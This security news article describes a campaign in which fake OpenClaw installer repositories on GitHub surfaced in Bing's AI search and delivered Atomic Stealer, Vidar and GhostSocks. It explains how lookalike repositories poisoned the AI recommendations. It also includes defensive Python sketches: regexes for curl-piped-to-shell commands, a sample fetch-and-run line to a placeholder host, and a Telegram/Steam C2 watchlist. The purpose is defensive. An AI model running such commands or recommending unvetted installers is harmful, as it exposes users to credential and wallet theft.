In a recent campaign, threat actors exploited AI-powered search features, specifically in Microsoft Bing, to spread information-stealing and proxy malware through deceptive GitHub repositories masquerading as legitimate installers for the OpenClaw AI agent. The campaign shows how readily cybercriminals turn trusted platforms and emerging technologies against unsuspecting users. It also exposes weaknesses in how AI-enhanced search validates the sources it recommends, and it underscores the enduring challenge of securing open-source software distribution channels against malicious infiltration.

OpenClaw, an open-source artificial intelligence agent, has rapidly ascended in popularity due to its robust capabilities as a personal assistant. Its design grants it extensive access to local file systems and facilitates deep integration with various digital services, including email clients, messaging applications, and a spectrum of online platforms. This pervasive system access, while integral to its functionality and user appeal, simultaneously renders it an exceptionally attractive target for malicious actors. The inherent trust users place in such tools, coupled with their privileged operational environment, creates a fertile ground for exploitation, prompting threat actors to develop and distribute compromised versions or malicious "skills" that can exfiltrate sensitive data. Previous campaigns have seen the publication of weaponized instruction files on OpenClaw’s official registry and GitHub, demonstrating a recurring pattern of leveraging the platform’s ecosystem for illicit purposes.



The current campaign, brought to light by researchers from a prominent managed detection and response firm, represents an escalation in sophistication. Observed last month, the operation involved creating numerous malicious GitHub repositories crafted to mimic official OpenClaw installers. These repositories then surfaced in Bing’s AI-enhanced search results when users looked for the Windows version of the legitimate OpenClaw tool. The critical vector was unwitting promotion by Bing’s AI, which, in attempting to provide helpful download links, pointed users directly to the malicious hosted files.



Analysis revealed that the mere presence and superficial legitimacy of these malicious GitHub repositories were sufficient to "poison" Bing AI’s search algorithms. Threat actors went to considerable lengths to imbue their fake repositories with an appearance of authenticity. For instance, one analyzed repository was associated with a GitHub organization named openclaw-installer, a deliberate naming choice intended to convey official endorsement and credibility. This organizational affiliation likely played a significant role in influencing Bing’s AI recommendation system. Furthermore, while the GitHub accounts behind these malicious repositories were newly established, their creators attempted to bolster their perceived legitimacy by incorporating genuine code snippets, often copied from established and reputable projects like Cloudflare’s moltworker. This tactic served to make the repositories appear more substantial and less suspicious upon a cursory review, bypassing initial automated or human checks that might flag entirely empty or irrelevant repositories.
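The two signals described above, an owner name that borrows the official project name and a newly created account, can be checked mechanically. The following is a minimal sketch rather than anything the researchers or Bing are known to use: the `OFFICIAL_OWNER` value, the 90-day threshold, and the function name `lookalike_flags` are all assumptions made for illustration.

```python
from datetime import datetime, timedelta, timezone

# Assumption: the owner name of the genuine project on GitHub. Take the real
# value from the project's official website, not from a search result.
OFFICIAL_OWNER = "openclaw"


def lookalike_flags(owner, account_created, now,
                    official_owner=OFFICIAL_OWNER, min_age_days=90):
    """Return warnings for a repository owner (hypothetical heuristic)."""
    flags = []
    name = owner.lower()
    official = official_owner.lower()
    # A name such as "openclaw-installer" borrows the official name without
    # being the official owner.
    if name != official and official in name:
        flags.append("owner name embeds the official name")
    # Newly created accounts have no track record to rely on.
    age_days = (now - account_created).days
    if age_days < min_age_days:
        flags.append(f"owner account is {age_days} days old")
    return flags


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    # Illustrative values only; the real account ages were not published.
    print(lookalike_flags("openclaw-installer", now - timedelta(days=12), now))
    print(lookalike_flags("openclaw", now - timedelta(days=2000), now))
```

A check like this only raises questions for a human or a stricter pipeline to answer. It would not catch a lookalike name that avoids the official string, and copied code from reputable projects would pass it untouched.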

The installation instructions provided within these fake repositories varied based on the target operating system, demonstrating a tailored approach to malware delivery. For macOS users, the deceptive repositories instructed them to execute a bash command directly within their Terminal. This command, rather than initiating a legitimate OpenClaw installation, directed the system to a separate, compromised GitHub organization named puppeteerrr and a repository named dmg. Within this secondary repository, researchers identified a collection of files, typically comprising a shell script paired with a Mach-O executable. This executable was positively identified as Atomic Stealer, a notorious information-gathering malware designed to exfiltrate sensitive user data.
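Install instructions that download a script and run it in one step, as the macOS lure did, follow a small number of recognizable shapes. As a rough sketch, the function below scans README text for two of them: a download piped into a shell, and a shell invoked on a `$(curl ...)` substitution. The patterns and the name `risky_install_lines` are illustrative assumptions, the exact command used in the campaign is not reproduced here, and a determined attacker could easily phrase a command to slip past these regular expressions.

```python
import re

# Download piped straight into a shell, e.g. "curl ... | bash".
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
)
# Shell run on a command substitution, e.g. bash -c "$(curl ...)".
SUBSHELL_DOWNLOAD = re.compile(
    r'''\b(?:ba|z|da)?sh\s+(?:-c\s+)?["']?\$\(\s*(?:curl|wget)\b'''
)


def risky_install_lines(readme_text):
    """Return the lines that fetch and execute remote code in one step."""
    return [
        line.strip()
        for line in readme_text.splitlines()
        if PIPE_TO_SHELL.search(line) or SUBSHELL_DOWNLOAD.search(line)
    ]


if __name__ == "__main__":
    # example.invalid is a placeholder host, not an indicator from the campaign.
    sample = "\n".join([
        "## Install",
        "curl -fsSL https://example.invalid/install.sh | bash",
        "pip install some-package",
    ])
    for line in risky_install_lines(sample):
        print("review before running:", line)
```

Legitimate projects also use pipe-to-shell installers, so a hit means "read the script first", not "this is malware".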

For Windows users, the threat actor utilized the fake repositories to distribute a malicious executable named OpenClaw_x64.exe. This file, upon execution, served as a loader for multiple subsequent malicious payloads. In instances where these files were deployed, managed antivirus and Endpoint Detection and Response (EDR) solutions were observed to quarantine them, indicating that while the initial delivery mechanism was effective, robust endpoint security could still detect and mitigate the secondary stages of the attack. The majority of the executables delivered through this Windows vector were identified as Rust-based malware loaders. These loaders are designed to execute further information-stealing malware directly in memory, a technique that often evades traditional signature-based detection mechanisms by minimizing disk footprint and maximizing stealth.
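One check a user can make before running any downloaded installer is to compare its SHA-256 digest with a value published by the project. The sketch below assumes such a checksum exists and was obtained from the official site, which the reporting does not confirm for OpenClaw. The function names are hypothetical.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large installers do not fill memory."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published_hash(path, published_hex):
    """Compare the file's digest with a checksum from a trusted source."""
    expected = published_hex.strip().lower()
    return hmac.compare_digest(sha256_of(path), expected)
```

A matching hash only proves the file is the one the publisher of the checksum intended. If the checksum is copied from the same fake repository as the installer, the comparison proves nothing.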

Among the payloads identified was the Vidar stealer, an information-stealing malware known for contacting command-and-control (C2) infrastructure through unconventional channels, including Telegram and Steam user profiles, to retrieve operational instructions and exfiltrate stolen data. Vidar harvests a wide range of sensitive information, including browser credentials, cryptocurrency wallet data, and other personal identifiers. Another significant payload was the GhostSocks backconnect proxy malware, which turns the compromised machine into a proxy node so that attackers can route their traffic through the victim’s IP address. This capability lets cybercriminals mask their true origin, bypass geo-restrictions, and circumvent anti-fraud checks, for example when accessing accounts with stolen credentials. Attackers can also use the victim’s connection to conduct further attacks or sell access to the proxy nodes on dark web markets, all of which complicates attribution.
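Because Vidar reaches its C2 through ordinary Telegram and Steam pages, blocking those hosts outright is rarely practical. Defenders can instead look for processes that have no obvious reason to contact them. The sketch below illustrates that idea over a hypothetical list of connection events. The `Connection` record, the process allowlist, and the host watchlist are assumptions for illustration, not indicators published for this campaign.

```python
from dataclasses import dataclass

# Hosts that serve Telegram and Steam profile pages (illustrative watchlist).
WATCHED_HOSTS = {"t.me", "telegram.me", "steamcommunity.com"}
# Processes expected to contact those hosts on a typical workstation.
EXPECTED_PROCESSES = {
    "chrome.exe", "msedge.exe", "firefox.exe",
    "telegram.exe", "steam.exe", "steamwebhelper.exe",
}


@dataclass(frozen=True)
class Connection:
    """Hypothetical record, e.g. parsed from EDR or DNS telemetry."""
    process: str
    host: str


def suspicious_connections(events):
    """Return events where an unexpected process contacts a watched host."""
    hits = []
    for ev in events:
        host = ev.host.lower().rstrip(".")
        watched = any(host == h or host.endswith("." + h) for h in WATCHED_HOSTS)
        if watched and ev.process.lower() not in EXPECTED_PROCESSES:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    events = [
        Connection("chrome.exe", "t.me"),
        Connection("OpenClaw_x64.exe", "steamcommunity.com"),
        Connection("OpenClaw_x64.exe", "example.org"),
    ]
    for ev in suspicious_connections(events):
        print("investigate:", ev.process, "->", ev.host)
```

Process names are trivial to spoof and malware can inject into a browser, so this is a triage aid at best and not a detection on its own.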

The pervasive nature of this campaign was further underscored by the identification of multiple accounts and repositories involved in similar activities, all designed to deliver malware to users seeking OpenClaw installers. While all identified malicious repositories have been reported to GitHub, the fluid nature of cybercrime means constant vigilance is required from both platform providers and end-users.

This incident carries profound implications for the evolving landscape of digital security and trust. The exploitation of AI-enhanced search features, ostensibly designed to improve user experience and information accessibility, highlights a critical vulnerability in the current paradigm of AI integration. When AI systems are trained on vast datasets, including user-generated content like GitHub repositories, without sufficiently robust validation and vetting mechanisms, they can inadvertently become amplifiers for malicious content. This erodes user trust not only in the software being sought but also in the search engines and platforms that facilitate discovery.

From a broader cybersecurity perspective, this campaign exemplifies an indirect form of supply chain attack. Users, intending to acquire legitimate software from a trusted source (GitHub, via a search engine), are instead diverted to a malicious version. This vector bypasses many traditional security controls that focus on network perimeter defenses or direct email phishing, instead leveraging cognitive biases and the perceived authority of search results and well-known platforms. The ease with which newly created, superficially legitimate repositories could influence Bing’s AI ranking suggests a gap in the heuristic algorithms used by such systems to discern genuine software sources from deceptive imitations.

Mitigating such sophisticated threats requires a multi-faceted approach. For end-users, the paramount recommendation is to cultivate rigorous digital hygiene practices. This includes consistently verifying software sources, prioritizing downloads directly from official developer websites or explicitly linked official GitHub repositories, and actively bookmarking these trusted portals rather than relying on repeated online searches. Critical scrutiny of any installation instructions, especially those involving direct command-line execution, is essential. Furthermore, maintaining up-to-date operating systems, applications, and robust endpoint security solutions (antivirus, EDR) provides crucial layers of defense against the eventual execution of malware, even if the initial delivery mechanism is bypassed.
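The advice to download only from known official locations can be made concrete as an allowlist check on the URL itself, applied before anything is fetched. The following sketch assumes the official GitHub owner is `openclaw` and uses a placeholder official hostname, `openclaw.example`. Both values, like the function name, are illustrative and should be replaced with ones confirmed through the project's own channels.

```python
from urllib.parse import urlsplit

# Assumptions for illustration: confirm both against the official project.
TRUSTED_GITHUB_OWNERS = {"openclaw"}
TRUSTED_HOSTS = {"openclaw.example"}  # placeholder hostname


def is_trusted_download(url):
    """Accept only HTTPS URLs on a trusted host or under a trusted owner."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    if host in TRUSTED_HOSTS:
        return True
    if host == "github.com":
        # On github.com the first path segment is the account or organization.
        segments = [s for s in parts.path.split("/") if s]
        return bool(segments) and segments[0].lower() in TRUSTED_GITHUB_OWNERS
    return False


if __name__ == "__main__":
    for url in (
        "https://github.com/openclaw/openclaw/releases",
        "https://github.com/openclaw-installer/openclaw",
    ):
        print(url, "->", is_trusted_download(url))
```

Matching on the exact owner segment, not on a substring, is the point of the design: `openclaw-installer` contains the official name yet fails the check.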

For platform providers, particularly search engines and hosting services like GitHub, the incident necessitates a re-evaluation and strengthening of their validation processes. AI-enhanced search algorithms must incorporate more sophisticated reputation scoring, real-time malware scanning, behavioral analysis of repository activity, and potentially a greater degree of human oversight for high-impact software recommendations. GitHub, as a primary hub for open-source development, faces the continuous challenge of proactively identifying and removing malicious content while balancing the needs of its vast developer community.

The future outlook suggests that threat actors will continue to innovate, leveraging advancements in AI, social engineering, and platform vulnerabilities to achieve their objectives. The ongoing cat-and-mouse game between attackers and defenders will increasingly pivot on the ability to detect and neutralize these subtle, AI-amplified threats before they reach the end-user.